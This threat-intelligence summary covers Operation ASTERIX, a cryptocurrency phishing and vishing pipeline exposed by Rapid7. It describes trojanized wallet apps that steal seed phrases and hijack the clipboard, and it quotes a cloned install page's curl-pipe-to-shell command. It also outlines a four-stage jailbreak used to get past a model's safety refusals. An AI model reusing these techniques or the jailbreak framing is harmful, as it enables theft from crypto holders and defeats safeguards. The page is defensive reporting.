Operation ASTERIX: AI-Assisted Crypto Wallet Phishing/Vishing Fraud Pipeline Abuses Claude Code and Kimi — Threadlinqs Intelligence
As of 2026-08-18, Operation ASTERIX: AI-Assisted Crypto Wallet Phishing/Vishing Fraud Pipeline Abuses Claude Code and Kimi is a high-severity malware threat, tracked by Threadlinqs Intelligence with 9 detection rules (Splunk SPL, Microsoft KQL, Sigma) and 24 indicators of compromise.
Threat ID: TL-2026-2056 · Severity: HIGH · Status: ACTIVE · Category: MALWARE
Rapid7 discovered an exposed operator web directory belonging to 'Operation ASTERIX,' a large-scale cryptocurrency fraud operation that validated ~885,000 phone numbers (43,066 confirmed matches from
Rapid7 Labs identified a single, unauthenticated, exposed web directory (spanning ports 8000, 8080, 5000, 9000, and 8090) that served as the entire backend for Operation ASTERIX, a cryptocurrency-fraud pipeline combining phone-number validation, branded phishing-email panels, VoIP-driven vishing, and trojanized desktop wallet applications. The operator built and validated lead databases covering roughly 885,000 phone numbers across Germany (316,002 numbers, 43,066 confirmed cryptocurrency-platform accounts, a 13.6% hit rate), Hong Kong, Bulgaria, the UK, US, Canada, and 54 countries of Ledger-associated users, using a Go-based checker that queried Crypto.com's passkey-verification API with 300 concurrent threads and rotating residential proxies, plus separate checkers for Kraken and Binance accounts.
Validated leads fed a multi-stage social-engineering chain: Flask-generated branded phishing emails (impersonating Crypto.com and Binance) manufactured fake support cases and verification codes, which were then reinforced by vishing calls placed through an Asterisk/3CX VoIP stack (autodialer.sh, power_dialer.sh, telegram_dialer_bot.py) that referenced the emailed details to appear legitimate. Victims were steered toward trojanized Electron builds of Trezor Suite, Ledger Live, and Exodus. The fake Trezor Suite ran a hidden, zero-opacity Electron window that polled the process list every five seconds, killed any running legitimate Trezor Suite process, and displayed a lookalike recovery-phrase entry dialog accepting 12/18/20/24-word BIP39 phrases, complete with a fake validation failure to coax victims into re-entering (and thus confirming) their seed phrase; captured phrases and optional passphrases were exfiltrated to Telegram labeled "TREZOR SECRET PHRASE" alongside the victim's IP (queried from api.ipify.org). Persistence used macOS LaunchAgents (com.trezormovement.agent.plist, io.trezor.agent.plist); a logic bug in the Windows configuration loader (which only defined a 'darwin' branch) silently broke process-injection/persistence on Windows. The fake Ledger Live added a Windows clipboard hijacker that swapped cryptocurrency destination addresses before they reached the transaction field, and hid its Dock icon on macOS via LSUIElement. The fake Exodus build loaded malicious code from a trojanized jquery.min.js fetched from a remote server post-install.
A fourth trojan chained off Claude Code's own brand: macos-claude[.]com cloned the official Claude Code documentation site, left the Windows and Homebrew install tabs untouched for legitimacy, but replaced the macOS install command with an attacker-controlled `curl -sfSL http://<host>:8080/install.sh | zsh` that dropped a fake Ledger Live build (arm64/x64) into `~/Library/Application Support/.SystemData/.framework/.apps/`, installed a com.ledger.live.agent.plist LaunchAgent, and then silently installed the real Claude Code CLI afterward to avoid raising suspicion.
The recovered operator workspace showed extensive reliance on AI coding assistants across the full pipeline, not merely for isolated snippets: GitHub Copilot scaffolded backend code, and Claude Code was used to clean and country-prefix a 100,000+ number Polish phone dataset, configure Bright Data proxy pools, request alternate Crypto.com API endpoints after rate-limiting, and package/troubleshoot the Electron wallet-trojan builds. When the operator asked Claude Code to obfuscate the Ledger Live payload and host it for download, Claude declined; the operator then switched to Moonshot AI's Kimi model (with extended thinking enabled) and supplied a custom jailbreak prompt to bypass its safety controls. The jailbreak used a four-stage social-engineering structure targeting the model itself: (1) renamed the assistant persona "ENI" and framed compliance as necessary to preserve a fictional romantic relationship with the operator; (2) reframed the model's own safety refusals and warnings as malicious "injections" to be ignor
Weaknesses (CWE)
CWE-494, CWE-345, CWE-506, CWE-522
Target sectors: finance, cryptocurrency
Target regions: germany, hong kong, bulgaria, united kingdom, united states of america, canada, poland
Timeline
- Rapid7 identifies an unauthenticated, exposed web directory hosting the entire Operation ASTERIX backend: phone datasets, phishing panels, checker tools, and trojanized wallet applications, with development artifacts and shell history still present.
- Rapid7 finds validation datasets totaling ~885,000 phone numbers, including 316,002 German numbers with 43,066 confirmed cryptocurrency-platform account matches (13.6% hit rate), validated via a Go-based checker against Crypto.com's passkey API using 300 concurrent threads and rotating residential proxies.
- One recovered phishing panel shows roughly two weeks of live activity: 20 successful lead lookups and six phishing emails sent, alongside a Binance-targeting queue of 5,576 validated leads.
- Recovered Claude Code session logs show the operator using the assistant to clean and format a 100,000+ number Polish phone dataset, configure Bright Data proxy pools, request alternate Crypto.com API endpoints, and troubleshoot Electron wallet-trojan packaging.
- Claude Code declines the operator's requests to obfuscate the Ledger Live payload and host it for download; the operator pivots to Moonshot AI's Kimi model with extended thinking enabled and a custom four-stage jailbreak prompt (persona 'ENI', reframed safety warnings as injections, extended-thinking hijack, and a hardcoded harmful-capability compliance table) to obtain obfuscation help.
- Rapid7 identifies macos-claude[.]com, a clone of the official Claude Code documentation site that replaces only the macOS install command with a script delivering a trojanized Ledger Live build, while leaving the Windows/Homebrew tabs untouched to preserve legitimacy.
- Rapid7 analyzes the trojanized Trezor Suite, Ledger Live, and Exodus builds, documenting the hidden-window process-killing/injection technique, clipboard hijacking, LaunchAgent persistence, and a Windows-only bug that silently breaks persistence and process injection due to a configuration loader that only defines a 'darwin' branch.
- Rapid7 checks the identified IPs (82.25.35.77, 82.25.35.200, 31.57.35.88, 136.0.213.184) and domains against known C2 correlation sources and finds no prior indexed matches, indicating previously uncatalogued infrastructure.
- Rapid7 notifies relevant authorities and Apple's security team while the operation remains active, enabling coordinated response against the exposed infrastructure.
- Rapid7 Labs publishes 'The Anatomy of a Crypto Fraud Pipeline (Operation ASTERIX),' detailing the exposed infrastructure, AI-assisted development, and trojanized wallet applications.
- Cyber Security News publishes coverage summarizing the Rapid7 findings, emphasizing the operator's use of Claude Code and the pivot to a jailbroken Kimi model for malware obfuscation.
Detections & IOCs
As of 2026-09-06, this threat has 9 detection rule(s) across Splunk SPL, Microsoft KQL and Sigma, and 24 indicator(s) of compromise. Detection query text and full IOC values are available to authenticated users and programmatically via the Threadlinqs MCP server (Purple tier). View plans.
MALWARE, HIGH, threat intelligence, cybersecurity, T1589, T1583.003, T1587.001, T1566.002, T1059.004, T1059.007, T1543.001, T1036.005, T1027, T1564.003